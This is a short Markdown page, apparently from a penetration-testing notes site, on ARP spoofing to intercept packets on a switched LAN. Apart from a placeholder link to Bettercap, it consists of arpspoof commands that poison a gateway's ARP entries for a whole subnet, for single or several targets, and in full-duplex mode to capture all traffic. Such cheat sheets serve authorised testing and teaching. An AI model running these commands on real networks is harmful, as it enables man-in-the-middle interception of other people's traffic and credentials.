+++
title = "ARP Spoofing"
description = ""
categories = []
tags = []
weight = 100
+++

## ARP Spoofing

> Intercept packets on a switched LAN

### Bettercap

See [Bettercap](xxx)

### Arpspoof

Assuming that `192.168.1.1` is the address of the gateway on the local subnet...

```bash
# spoof all hosts on the subnet
arpspoof 192.168.1.1

# use a specific interface
arpspoof -i eth0 192.168.1.1

# spoof a specific target host
arpspoof -t 192.168.1.100 192.168.1.1

# spoof both hosts to capture all traffic (full duplex)
arpspoof -r -t 192.168.1.100 192.168.1.1

# spoof several target hosts
arpspoof -t 192.168.1.100 -t 192.168.1.101 192.168.1.1
```
